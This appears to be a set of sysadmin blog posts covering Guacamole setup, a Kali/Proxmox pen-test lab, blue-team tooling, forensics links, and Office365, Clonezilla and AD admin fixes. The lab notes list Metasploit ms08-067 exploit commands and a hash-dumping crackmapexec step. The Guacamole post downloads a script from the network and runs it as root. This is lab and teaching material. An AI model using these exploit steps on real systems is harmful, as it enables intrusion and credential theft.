Setup Guacamole Remote Desktop Gateway on Ubuntu with one script

How to replace RDP, SSH and TeamViewer with a free, open-source, web-based, clientless remote desktop gateway.

 

I recently learned about Guacamole and found that the setup is quite easy. I had been looking for a way to access all of my virtual and physical machine desktops remotely, but didn’t want to rely on, or trust, TeamViewer forever. Guacamole is open-source software that runs as a Tomcat/Apache/MySQL server suite and brokers remote desktop connections through a web browser, much like TeamViewer. It lets you connect to any number of different desktops from anywhere with just an HTML5 web browser and a single open port on your firewall: you log into a console that has access to all your desktops, without having to install or configure remote clients such as PuTTY, RDP, or a VPN.

The installation documentation on the official site is comprehensive, but I was able to set up the system quickly thanks to Chase Wright’s post here.

First, you’ll want a standard Ubuntu server or virtual machine installed and running. I installed Guacamole on Ubuntu Server 16.10.

Second, open an ssh connection to your server and run the following commands:

sudo su -
wget https://raw.githubusercontent.com/MysticRyuujin/guac-install/master/guac-install.sh
chmod +x guac-install.sh
./guac-install.sh

The installation will take a little while to download and install, and should only prompt you for a MySQL database password.
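Before moving on, it’s worth sanity-checking that the stack came up. A quick look – this is just a sketch, and the exact service names (tomcat8 vs tomcat7, mysql vs mariadb) vary by Ubuntu release and script version:

systemctl status guacd
systemctl status tomcat8
systemctl status mysql
ss -tlnp | grep 8080    # confirm Tomcat is listening for Guacamole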

For me, that was pretty much it for the initial setup. Next, I went to a different computer and connected to the guacamole gateway at the following default website:

http://serverIPaddress:8080/guacamole (replace serverIPaddress with your Ubuntu server’s IP)

Login with the default guacamole username/password: guacadmin/guacadmin

The initial interface is a little sparse, but to create an RDP connection do the following:

  1. Create a new user before you create a connection because, by default, Guacamole will launch a desktop session as soon as you next log in. If there’s a problem with the connection you may get stuck. This happened to me and I was stuck on the error:
    “Connection Error: An internal error has occurred within the Guacamole server, and the connection has been terminated”

    It took a little digging, but essentially the admin console is still up and running behind the black screen/pop-up, and you can get back into the settings by going to the URL: http://serverIPaddress:8080/guacamole/#/settings/sessions

  2. Create the user by going to the menu in the upper right-hand corner and choosing Settings.
  3. Next, click the Users tab and then New User.
  4. Provide a username, enter the password twice, give this new user all permissions, and hit Save at the bottom.
  5. With this new user created, log in as the new user and change the guacadmin account password.
  6. Now we can create our first connection. Before you create your first RDP connection, be sure to test the RDP account credentials from a different computer to ensure you can connect successfully.
  7. Click the Connections tab and then New Connection. The only settings I needed to get my workstation RDP connection working were the essentials: the RDP protocol plus the workstation’s hostname/IP, port, and account credentials.
  8. Hit Save at the bottom. There are many additional settings available, but this should get you up and connected.
  9. Now we want to assign this connection to a user. Do that by going into the Users tab again, finding the user you want, and assigning the connection.
  10. Now go to a different computer from the one you want to connect to, browse to http://serverIPaddress:8080/guacamole, log in as the user with the connection assigned, and you should be greeted with the RDP console of the remote computer.
  11. Setting up an SSH connection is even easier. Again, first create a new user with the same name as the SSH server you want to connect to (I named my user HN-DHCP01). Then create a new connection, name it the same as your server, and choose the SSH protocol.
  12. Under the Authentication settings, provide a valid SSH user’s credentials for the server you’ll be connecting to.
  13. Hit Save at the bottom. Go back into the Users tab, select the new user (HN-DHCP01), assign the connection at the bottom, and hit Save.
  14. Log out of Guacamole, then log in as the new user (HN-DHCP01); this will instantly log you into an SSH session running right in the browser.
  15. Guacamole also supports two-factor authentication, as well as a multitude of additional setups and configurations. It’s wise to set up 2FA before opening any firewall ports into your local network from the internet, and to follow all security precautions and test everything thoroughly. Enjoy your guacamole, and let me know in the comments if I’ve missed anything.

 

Installing Kali Linux on ProxMox – Building a Penetration Test Lab – Part 2

In the process of building a Penetration Test Lab, I wanted to get started with the installation of a Kali Linux virtual machine running on ProxMox. To get started, first download the latest version of Kali Linux (ISO) here. Grab the Kali 64-bit ISO (2017.1, about 2.6 GB).

Build your new VM (Proxmox > Create VM) using the ISO you’ve downloaded.

Other users have reported Kali not working after installation, so it’s recommended to change the display type to VMWare compatible. After building the VM, go to Hardware > Display > Edit > choose VMWare compatible.

Kali installs onto a virtual hard drive on ProxMox (we will not be running a “live” version of Kali). Start the new VM, scroll down the menu, and choose Install (not GUI install).

During installation, when the installer asks where to install GRUB, choose to enter your own location and manually enter the path: /dev/sda
Otherwise, if you choose the default or the path already listed, then after completing the installation and restarting, you’ll get a “Booting from Hard Disk” message, the boot sequence will not complete, and the VM will essentially hang.

Once Kali completed its setup, I booted the Kali VM, logged in, and landed on the desktop.

Run apt-get update and apt-get upgrade to update the packages on your system.
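On a fresh Kali VM that amounts to the following, run as root (dist-upgrade is optional but also pulls in kernel and held-back package updates):

apt-get update
apt-get -y upgrade
apt-get -y dist-upgrade    # optional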

Before we go on to complete the setup of the rest of our lab with known-vulnerable hosts, let’s run some cursory nmap scans.

Let’s run a ping scan on our own network with the command:

nmap -v -sn 10.0.10.0/24

This says: nmap, print verbose output (-v), do a Ping Scan (-sn) – (disable the default port scan for each address), and use the network 10.0.10.0 with a CIDR of /24.

This scan will attempt to ping all 254 addresses. The highlights of the scan are below:

root@HN-kali01:~# nmap -v -sn 10.0.10.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:13 PDT
Initiating ARP Ping Scan at 15:13
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:13, 1.95s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 15:13
Completed Parallel DNS resolution of 255 hosts. at 15:13, 5.53s elapsed
Nmap scan report for 10.0.10.0 [host down]
Nmap scan report for pfSense2x.jasoncoltrin.local (10.0.10.1)
Host is up (0.00048s latency).
MAC Address: 62:65:B1:30:52:A7 (Unknown)
Nmap scan report for 10.0.10.2 [host down]
Nmap scan report for 10.0.10.3 [host down]

...
...
Nmap scan report for 10.0.10.51
Host is up (0.00049s latency).
MAC Address: 18:03:73:34:34:36 (Dell)
Nmap scan report for 10.0.10.52 [host down]
Nmap scan report for 10.0.10.53 [host down]

So here we see that the scan detected my pfSense virtual machine firewall on IP 10.0.10.1, and gave me the MAC Address.

Let’s take a closer look at the Dell workstation found on 10.0.10.51. To do so, let’s run a port scan:

nmap -p 1-65535 -sV -sS -T4 10.0.10.51

This scan does the following:

Run a full port scan on ports 1-65535 (-p 1-65535), detect service versions (-sV), use a stealth SYN scan (-sS), use T4 timing (-T4), with IP 10.0.10.51 as the target.

Below are the results:

root@HN-kali01:~# nmap -p 1-65535 -sV -sS -T4 10.0.10.51

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:17 PDT
Nmap scan report for 10.0.10.51
Host is up (0.00047s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2179/tcp  open  vmrdp?
27036/tcp open  ssl/steam    Valve Steam In-Home Streaming service (TLSv1.2 PSK)
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 18:03:73:34:34:36 (Dell)
Service Info: Host: JCDESKTOP; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.84 seconds

Because I don’t always like to use my new Kali VM via the ProxMox console, I want to run my Kali desktop over VNC tunneled through a secure SSH connection.
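The gist of that setup, as a minimal sketch – this assumes a VNC server such as TightVNC or TigerVNC is installed on the Kali VM, and that display :1 maps to TCP port 5901:

# on the Kali VM: start a VNC server on display :1 (listens on TCP 5901)
vncserver :1
# on your workstation: forward local port 5901 to the Kali VM over SSH
ssh -L 5901:localhost:5901 root@<kali-ip>
# then point a VNC client at the tunnel
vncviewer localhost:5901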

In the next post, we’ll look more at nmap, as well as some other pen-test tools.

Security – Blue Team – Building a security project on a budget

How to Create and Build a Security Profile for Your Network on a Budget – Part 1

Start with Building a Foundation (or use an existing good one).

Credit to Kyle Bubp & irongeek.com: http://www.irongeek.com/i.php?page=videos/bsidescleveland2017/bsides-cleveland-102-blue-teamin-on-a-budget-of-zero-kyle-bubp

Use a Base Framework for your security project. There are a lot of standards available and the NIST government standards are a good solid foundation:

  • NIST 800-53
  • NIST Cybersecurity Framework
  • CIS Critical Security Controls
  • NIST-CSF tool – a nice visual, graphical interface for the stages of building a security program

Document everything

A core documentation repository is critical when setting up a security project – others will follow you and will need to look up the information you have recorded. It’s best to have a security incident response ticketing system and documentation before you need it. Have these tools up and ready.

For policy, procedure, how-tos, etc:

  • MediaWiki (free)
  • Atlassian Confluence ($10 for 10 users) – Gliffy plugin for Confluence diagrams
  • OneNote/SharePoint – not every company is entirely open source

Incident Response Ticketing/Documentation systems:

Map out your entire network

  • NetDB – uses the ARP tables and MAC databases on your network gear. Give it a service account and NetDB will use ssh/telnet to find every device connected, and it will give you a nice HTTP interface. You can set up a cron job that rescans the network every hour and pipe new device connections to an email address. Knowing when something new comes onto your network is critical.

An .ova is available at https://www.kylebubp.com/files/netdb.ova

Supports the following: Cisco, Palo Alto, Junos, Aruba, Dell PowerConnect

  • nmap scans + ndiff/yandiff – not just for red teams; export results and diff them for changes, alerting if something changed (a minimal nightly diff job is sketched after this list).
  • NetDisco

https://sourceforge.net/projects/netdisco – uses SNMP to inventory your network devices.

  • Map your network – create a Visio document and have a good network map.
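Here is the kind of nightly nmap + ndiff job referenced above – a minimal sketch, assuming scan results are kept under /var/scans, ndiff is installed alongside nmap, and a local mail command exists:

#!/bin/sh
# /usr/local/bin/scan-diff.sh - rescan the network and mail any changes
# (the first run will complain until two scans exist)
cd /var/scans || exit 1
mv current.xml previous.xml 2>/dev/null
nmap -sn -oX current.xml 10.0.10.0/24 >/dev/null
ndiff previous.xml current.xml | mail -s "nmap diff $(date +%F)" you@example.com

# run it nightly from cron:
# 0 2 * * * /usr/local/bin/scan-diff.sh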

Visibility

Facebook developed osquery, and this tool can give you much of the visibility you need.

Agents for MacOS, Windows, Linux

Deploy across your enterprise w/ Chef, Puppet, or SCCM

Do fun things like search for IoCs (FBI-published file hashes, suspicious processes) – pipe the data into the Elastic Stack for visibility and searchability.
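To give a flavor of what that looks like, two example queries from the interactive osqueryi shell – a sketch; the table and column names are from stock osquery:

# processes whose binary no longer exists on disk (a classic malware tell)
osqueryi "SELECT name, path, pid FROM processes WHERE on_disk = 0;"
# hash a file so you can compare it against published IoC hashes
osqueryi "SELECT path, sha256 FROM hash WHERE path = '/usr/bin/sshd';"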

User Data Discovery

OpenDLP – available on GitHub or as a downloadable .ova – will scan file shares; using a normal user account you can scan for available shares and data. Run it over the weekend and see what you can find. Then find the data owners and determine where the data should reside.

Hardening Your Network

CIS Benchmarks – Center for Internet Security Benchmarks: 100+ configuration guidelines for various technology groups to safeguard systems against today’s evolving cyber threats.

Out of the box, Windows 10 meets only about 22% of the CIS benchmark.

It’s difficult to secure your network if everything is a snowflake. While not exciting, configuration management is important. Deploy configs across your org using tools like GPO, Chef, or Puppet.

Change management is also important – use a git repo for tracking changes to your config scripts.
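Even a bare-bones repo buys you an audit trail. A minimal sketch, assuming your config scripts live in /etc/configs:

cd /etc/configs
git init
git add -A && git commit -m "baseline configs"
# ...after each change:
git add -A && git commit -m "describe what changed and why"
git log --stat    # who changed what, and when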

Safety vs. Risk

Scanning for Vulnerabilities:

OpenVAS (Greenbone) is a still-maintained fork of Nessus and is the default vulnerability scanner in AlienVault. It does a great job in comparison with commercial products. Be careful: do some safe scans first, and it’s not recommended to scan critical life-support equipment, for example in a hospital.

Scan web apps:

Arachni Framework – for finding bugs in your developer’s code

OWASP ZAP (Zed Attack Proxy)

Nikto2 (Server config scanner)

Portswigger Burp Suite (not free – $350)

Harden your web servers:

Fail2ban – Python-based IPS that runs off of log files such as Apache’s (a minimal jail sketch follows below)

ModSecurity – Open source WAF for Apache & IIS
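As a sketch of a minimal Fail2ban setup – jail names and log paths vary by distro and Fail2ban version, so treat these values as examples only:

# /etc/fail2ban/jail.local
[sshd]
enabled  = true
maxretry = 5
bantime  = 3600

[apache-auth]
enabled  = true
logpath  = /var/log/apache2/error.log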


Linux Digital Forensics Web Resources

Below is a list of digital forensics resources for Linux. I especially enjoyed reading Luis Rocha’s intro guide to Linux Forensics (#19).

  1. VirusTotal – Free Online Virus, Malware and URL Scanner
  2. TSK Tool Overview – SleuthKitWiki
  3. The Sleuth Kit
  4. Taking advantage of Ext3 journaling file system in a forensic investigation
  5. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 1)- Extents – SANS Institute
  6. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 2)- Timestamps – SANS Institute
  7. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 3)- Extent Trees – SANS Institute
  8. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 4)- Demolition Derby – SANS Institute
  9. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 5)- Large Extents – SANS Institute
  10. SANS Digital Forensics and Incident Response Blog – How To – Digital Forensics Copying A VMware VMDK – SANS Institute
  11. SANS Digital Forensics and Incident Response Blog – Blog – SANS Institute
  12. qemu-img(1)- QEMU disk image utility – Linux man page
  13. qemu-img for WIndows – Cloudbase Solutions
  14. National Software Reference Library (NSRL) – NIST
  15. ltrace – Wikipedia
  16. Logical Volume Manager (204.3)
  17. Linux-Unix and Computer Security Resources – Hal Pomeranz – Deer Run Associates
  18. The Law Enforcement and Forensic Examiner’s Introduction to Linux
  19. Intro to Linux Forensics – Count Upon Security
  20. https://www.kernel.org/doc/Documentation/filesystems/ext4.txt
  21. GitHub – log2timeline/plaso – Super timeline all the things
  22. Filesystem Hierarchy Standard
  23. Digital Forensics – SuperTimeline & Event Logs – Part I – Count Upon Security
  24. Digital Forensics – NTFS Metadata Timeline Creation – Count Upon Security
  25. Digital Forensics – Evidence Acquisition and EWF Mounting – Count Upon Security
  26. chkrootkit — locally checks for signs of a rootkit

Building a penetration test lab – Part 1

Notes on how to create a Penetration Testing Lab

I’ve always had an interest in penetration testing and have messed around with nmap and nessus, but now I’m going to dig in my heels and become proficient with the tools of the pen-test theater. The following post is more of an outline of what is found in a YouTube video from Derbycon 2016, which I found here. The speaker was inspiring, as were a few others who’ve spoken, because they said that sysadmins make good penetration testers: someone who is good at building systems and networks in general does well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddie, or a black-hat cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with Python to build my own tools.

Since I last upgraded my VM server to Proxmox, I’ve been kicking around ideas on how to use the hardware to its fullest potential. I’ve already gotten started by first creating a new network on my Proxmox host, and I started up the first server in my segregated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along, so stay tuned.

-Start of Video notes-

Credit: David Boyd
Pentest lab requirements:

  • Core i5 CPU
  • 16 GB RAM
  • 250-500 GB HDD
  • 7zip

VM software:

  • virtualbox
  • VMWare
  • Hyper-V
  • (I’ll be using) ProxMox

Pentesting platforms:

  • Kali Linux
  • Samurai WTF (Web App Testing)
  • SamuraiSTFU (Utility Hacking)
  • Deft Linux (Forensics)

Old stuff:

  • olpix (?)
  • IWax(?)
  • backtrack (now Kali)

Offensive Security provides pre-compiled Linux distro images.

Note: generate your own SSH keys

Now we need something to attack…
Vulnerable VM’s:

  • Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu; has remote logins, backdoors, default passwords, vulnerable web services
  • Morning Catch (Phishing)
  • OWASP Broken Web Applications (WebApps)
  • WebGoat (Web Applications)
  • vulnhub.com (challenge VMs)
  • Kioptrix (Beginners)
  • PwnOS

Guides to pen-test exploits:
https://community.rapid7.com/docs/DOC-1875

Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab

Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380

VMs to build and test:

Do not expose vulnerable VMs to the internet!
Make them host-only (or in Proxmox create a new isolated bridge, as sketched below).
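For the Proxmox route, an isolated bridge with no physical NIC attached keeps the vulnerable VMs off your real network. A sketch of /etc/network/interfaces on the Proxmox host (vmbr1 is an arbitrary name):

auto vmbr1
iface vmbr1 inet manual
        bridge_ports none
        bridge_stp off
        bridge_fd 0

Attach the vulnerable VMs (and one interface of your Kali VM or lab firewall) to vmbr1 only.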

More tools:

  • nmap
  • nessus
  • cain (still works)
  • responder
  • john the ripper/hashcat
  • metasploit (free version works great)
  • SET/GoPhish/SPF (social engineering)
  • Discover Scripts – great stuff – great reconnaissance
  • PowershellEmpire
  • CrackMapExec (post exploit)

How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm

Once the virtual machines have been set up and set to ‘host only’, ping each VM to confirm connectivity.

Initial testing and exploit example:

On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows module options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit

kali:~# crackmapexec
(dumps hashes)

Phishing server – load up GoPhish – set it up, add users, make a campaign.

Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed

Hack This Site!
https://www.hackthissite.org/
Youtube videos:
Derbycon, BSides, DefCon, ISSA

More information: Sans Cyber Aces, InfoSec Institute, Cybrary

It’s wise to find a mentor, as well as do some mentoring

Recommended reading (actual paper books):

  • The Hacker Playbook – Peter Kim
  • Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
  • Metasploit: The Penetration Tester’s Guide
  • Hacking: The Art of Exploitation – Jon Erickson
  • Professional Penetration Testing
  • The Art of Intrusion – Kevin Mitnick
  • The Art of Deception – Kevin Mitnick
  • Ghost in the Wires – Kevin Mitnick
  • Black Hat Python – Justin Seitz

-End video notes-

Office365 Outlook Room Calendar not showing details – displays busy only – fix when Set-MailboxFolderPermission does not resolve

Solved: Office365 resource Rooms & Equipment cannot view details or subject in a shared calendar, can only see “Busy”, and Set-MailboxFolderPermission did not fix or resolve it.

So a room calendar would not display who reserved the room, and users requested that room-reservation calendars display who reserved the room along with the details. By default the event only displays “Busy”. Most posts I found online for this issue have the same resolution: use Set-MailboxFolderPermission to display details, comments, subject, and organizer. I tried this using the identity in quotes as well as the full email address of the room; however, the Set-MailboxFolderPermission setting did not work, and the calendar would still only show “Busy”.

I was able to resolve the problem by looking at the rights of the users.

I found that the calendar AccessRights for the user “Default” were only {AvailabilityOnly}.

To check permissions and fix this issue, first open PowerShell and connect to your O365 Exchange with the following commands:

$LiveCred = Get-Credential
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $LiveCred -Authentication Basic -AllowRedirection
Import-PSSession $Session

Once connected, check that the Default user has the correct AccessRights on the calendar. As you can see below, the Default user had only {AvailabilityOnly} when issuing the following command:

PS C:\admin> Get-MailboxFolderPermission roomname@domain.com:\Calendar

FolderName           User                 AccessRights
----------           ----                 ------------
Calendar             Default              {AvailabilityOnly}
Calendar             Anonymous            {None}

I changed the AccessRights from {AvailabilityOnly} to {PublishingAuthor} with the following command:

Set-MailboxFolderPermission -Identity "roomname@domain.com:\Calendar" -User default -AccessRights PublishingAuthor

And then ensured the identity has the correct CalendarProcessing switches with this command:

Set-CalendarProcessing -Identity "roomname@domain.com" -AddOrganizerToSubject $true -DeleteComments $false -DeleteSubject $false
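To confirm both changes took effect, you can read the settings back with the matching Get- cmdlets (the room address is a placeholder, as above):

Get-MailboxFolderPermission roomname@domain.com:\Calendar
Get-CalendarProcessing -Identity "roomname@domain.com" | Format-List AddOrganizerToSubject,DeleteComments,DeleteSubject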

Now the event details and subject can be viewed by everyone. The change takes effect pretty quickly – within a minute, the “Busy” events should change to display details when you close/reopen Outlook or switch between the calendars in Outlook online. Hope this saves someone else a call to MS Support.

SmarterMail Enterprise 15.5 – Export / Import iCalendar/Outlook calendar into SmartMail

How to import iCalendar events into SmartMail / SmarterMail Enterprise IMAP calendar

So one of my clients has a team that has been using iCalendar to share calendars but has decided to migrate to SmarterMail Enterprise 15.5 IMAP/Exchange for their team calendar sharing. While there is no way to import iCalendar events into SmarterMail directly, there is a two-step approach that works pretty well.

In this case, the client only wants to migrate historical data and not current/future events. It sounds harder than it is; the migration shouldn’t take long or require much effort. If you don’t have a spare Gmail account to use, you may want to create a new Gmail account just for this purpose, or delete all calendar events in an existing Google calendar between migrations.

One thing that I did notice is that recurring appointments will be transferred over, and this may in turn create duplicates if you already have recurring appointments in SmarterMail. It may be wise to remove recurring appointments from the source calendar prior to doing the first export.

As always it’s best to first backup your data prior to doing anything, then run a few tests to make sure that all calendar events, items, and attachments transfer successfully during the migration.

But in our test case, the Outlook (iCalendar) – to – Gmail – to – SmarterMail route works perfectly fine.

First go to Outlook > File menu > Open & Export > Import/Export > Select your iCalendar (and any other calendars you’d like to export):

Export to .CSV > Calendar (here you can select the date range of events to be exported) > save to something like C:\Users\jcoltrin\Desktop\jasoncalendar.csv

Then

Log in to any Google account/Gmail > Calendar > gear icon > Settings > Calendars > Import calendar > choose jasoncalendar.csv (import successful).

The calendar items now display in my Google calendar.

Now that the calendar items are in my Google calendar, I went into my SmarterMail account > Settings > Advanced Settings > Mailbox Migration > Account type: GMAIL > Next > check “Calendar” > do the Google authentication (which works well and uses Google’s authentication) > Import.

Now the same calendar items are in my SmarterMail calendar.

Clonezilla – identify original disk size of clone .img image by looking at flat files

How to find the original HDD hard drive disk size in a Clonezilla img image file

So if you’re a fan of Clonezilla like I am, you may have a library of .img images on a file share somewhere. I find that when taking an image of a system, it’s best to name the image/file with something descriptive such as (Win7-64-Optiplex7040-500GB-Date-img). But what happens if you want to restore data from an image onto a new hard drive, but you can’t remember, or didn’t write down, the size of the disk it was originally imaged from? As you may already know, Clonezilla doesn’t like to be restored onto a disk smaller than the original. There are some advanced options when saving a disk-to-image or restoring image-to-disk in Clonezilla; however, I haven’t found a reliable way to restore an image to a smaller drive.

In the event you have an old image, you’re not sure what size disk it came from originally, and you didn’t name your file with the original disk size, there is a way to find the original disk size using the flat files that Clonezilla creates when taking the image. To do this, go into the img folder, look for a file named sda-pt.parted.compact, and open it with a text editor such as Notepad++.

This file contains everything you need to know to determine the original size of the HDD that existed in the computer before you took the clone. For example, here are the contents of that file:

Model: ATA WDC WD2500AAJS-7 (scsi)
Disk /dev/sda: 250GB
Sector size (logical/physical): 512B/512B
Partition Table: msdos
Disk Flags: 

Number  Start   End    Size   Type     File system  Flags
 1      1049kB  106MB  105MB  primary  ntfs         boot
 2      106MB   250GB  250GB  primary  ntfs

As you can see, we get a model number, manufacturer, disk size, partition sizes, and file-system type.
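If you just want the disk size without opening an editor, a quick grep across your image library does it – a sketch, assuming your images live under /srv/clonezilla:

grep -H "^Disk /dev/" /srv/clonezilla/*/sda-pt.parted.compact
# e.g. .../Win7-64-Optiplex7040-500GB-Date-img/sda-pt.parted.compact:Disk /dev/sda: 250GB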

I haven’t had trouble restoring Clonezilla images to different manufacturers of hard drives as long as the new drive is larger than the original drive. Also, I find that it’s invaluable to have at least a gigabit connection between the machine you’re trying to clone and the file share where you’re saving the img file.


Test USB 3.0 and USB 2.0 thumb flash drive on Windows 10 read write speeds

How to test USB thumb drives for USB 3.0, USB 2.0, and test Read and Write Speeds on Windows 10

Determine if USB Port is 2.0 or 3.0 in Windows 10:

Below are some directions and screenshots showing how you can tell whether a USB drive is connected to Windows 10 at USB 3.0 or USB 2.0. First, insert the drive into a USB port on your Windows 10 computer.

Click on the Start Button > then click on the Settings gear icon > in the “Find a Setting” box > type “Connected Devices” > then click on the “Connected Device Settings” icon. The USB 3.0 will show “Connected to USB 3.0”, the USB 2.0 drives will not display these words:

Testing Read and Write speeds of USB 2.0 and USB 3.0 with SpeedOut utility and  Windows 10.

I picked up a couple of thumb drives this weekend that were on sale at Fry’s. I like to have both USB 2.0 and USB 3.0 drives on hand in case a computer doesn’t recognize a USB 3.0 drive as a boot drive. I wanted to measure the read and write speeds of my USB drives to see whether they actually perform according to their listed specs (spoiler alert: numbers can be deceiving). My PC workstation has an Intel SSD and USB 3.0 ports. I downloaded and ran the SpeedOut v0.5 utility against 4 different USB thumb drives:

  1. Patriot Memory Flash PSF32GBLZ3USB 32GB USB3.0 BLITZ with a yellow plastic case.
  2. Hyundai USB 2.0 Bravo 16GB with a metal case.
  3. Kingston USB 2.0 DTS E9 Data Traveller 16GB with a metal case.
  4. SanDisk Ultra USB 3.0 32GB SDCZ48-032G with a plastic case.

All four drives were formatted FAT32 (and I also tested the Patriot drive as NTFS). As described above, you can confirm a drive is connected at USB 3.0 in Windows 10 under Connected Device Settings, where it should say “Connected to USB 3.0”.

Anyway, I ran the SpeedOut utility against the Patriot USB 3.0 drive first, and the results were 23.7 MB/s READ and 27.8 MB/s WRITE.

I ran the same SpeedOut test on the same USB port using a Hyundai USB 2.0 BRAVO 16GB drive (it wasn’t recognized as USB 3.0 by Windows 10), and its results were 21.9 MB/s READ and 10.5 MB/s WRITE.

Then I ran the same SpeedOut test using a Kingston DTS E9 DataTraveler, and its results were 17.158 MB/s READ and 9.8 MB/s WRITE.

Lastly I ran the same SpeedOut test again using a SanDisk Ultra USB 3.0 32GB drive and the results were: 128.04 MB/s READ and 52.47 MB/s WRITE.

I gave the Patriot USB 3.0 drive another chance; the results of a second read/write test against the drive were pretty good.

This test gave me hope that the drive would have decent write speeds, but upon copying an ubuntu-16.10-server-amd64.iso file (684.032 MB) from my SSD to the Patriot USB 3.0 drive, the results showed surprisingly slow speeds after an initial burst.

I thought perhaps this had to do with the drive being formatted FAT32, so I reformatted it as NTFS and tried again, running SpeedOut first and then the same Ubuntu .iso copy.

Same results. The write speed alternated between 6.24 MB/s and 12 MB/s, which is in all reality pretty abysmal for a USB 3.0 drive! The total copy time for the 684MB file was 55.12 seconds…

The total copy time for the Hyundai USB drive for the same Ubuntu .iso was 1:10.02.

The Patriot USB 3.0 drive did not fare much better than the Hyundai USB 2.0 drive, but I did notice that there is an initial speed burst when copying data to the Patriot drive. To test this I copied a ~94MB file to the Patriot drive; while the first copy finished quickly at around 60 MB/s, subsequent tests were very slow again, in the 6-12 MB/s range. There is no other way to describe the Patriot drive than flaky: fast sometimes for a little while, but ultimately pretty slow – just a little better than the USB 2.0 drives.

Lastly, I tested the copy of the same Ubuntu .iso file to the SanDisk Ultra USB 3.0 32GB drive formatted FAT32, and the copy took just 14.59 seconds!

Just because something says USB 3.0 and is on sale, doesn’t mean you’re going to get true USB 3.0 speeds reliably…

 

New Active Directory User and Office365 New User Powershell Procedure

As a systems administrator, you’ll often need to create new user accounts in Active Directory and MSOnline Office 365. It’s good to streamline your new-user creation procedure as much as possible to make the process faster and more accurate. Thanks to PowerShell, we can turn a whole bunch of pointing and clicking into just a few commands. In this example procedure we will first create an Active Directory user account with PowerShell and a .csv file, then add that user into multiple groups with a second script and a .txt file listing the groups. We will also use another script to get the canonical names of the groups so that our script can find the LDAP location of each group in Active Directory. Second, because we do not run our own Exchange server, we will use PowerShell to connect to Office 365, create the user there, license the user, and add the user to some distribution groups. The prerequisites are PowerShell with the Active Directory and MSOnline modules imported.

 

  1. Go to https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Create-Active-7e6a3978 and download the create_ad_users.zip and extract to c:\newusers\
  2. Edit create_ad_users.ps1 lines 92 and 98 to accommodate longer last names. The original script allows only a first initial followed by a last name truncated to 4 characters. In my case we have some users with long last names, so I set those values to 20:
  3. If($replace.length -lt 20)
    {
      $lastname = $replace
    }
    Else
    {
      $lastname = $replace.substring(0,20)
    }
    

     

  4. Copy info from your HR department about the new user into the .csv file c:\newusers\import_create_ad_users.csv
  5. Run PS C:\newusers> .\create_ad_users.ps1
  6. Next, check the new user account in ADUC for such things as account name, address, phone number, etc., to ensure the entries are accurate.
  7. With our new user account created, most likely we will want to make the user a member of several security groups. To do that with PowerShell, we need the correct LDAP names for our groups, placed into a file named groups.txt. To get them, we run another PowerShell script named find-dn.ps1. The code is as follows:
    # Function Find Distinguished Name
    function find-dn { param([string]$adfindtype, [string]$cName)
        # Create A New ADSI Call
        $root = [ADSI]''
        # Create a New DirectorySearcher Object
        $searcher = new-object System.DirectoryServices.DirectorySearcher($root)
        # Set the filter to search for a specific CNAME
        $searcher.filter = "(&(objectClass=$adfindtype) (CN=$cName))"
        # Set results in $adfind variable
        $adfind = $searcher.findall()
        
        # If Search has Multiple Answers 
        if ($adfind.count -gt 1) {
            $count = 0 
            foreach($i in $adfind)
            {
                # Write Answers On Screen
                write-host $count ": " $i.path
                $count += 1
            }
            # Prompt User For Selection
            $selection = Read-Host "Please select item: "
            # Return the Selection
            return $adfind[$selection].path
        }
        # Return The Answer
        return $adfind[0].path
    }

    This code should be inserted into a new PowerShell ISE tab and then saved as find-dn.ps1. Running the code defines a new PowerShell function (it will not write any output to the screen). Find the group names in ADUC that you want the CN for, and then use the following command to return the CN:

    find-dn "group" "FinanceGroup"

    The script will return something similar to the following:

    LDAP://CN=FinanceGroup,CN=Users,DC=intranet,DC=contoso,DC=com

    Remove the “LDAP://” prefix and copy the remaining string into the c:\newusers\groups.txt file which, after finding the rest of your group CNs, should look something like the following:

    CN=FinanceGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=HRGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=OperationsGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=ITGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=AccountingGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=ComplianceGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=MarketingGroup,CN=Users,DC=intranet,DC=contoso,DC=com

     

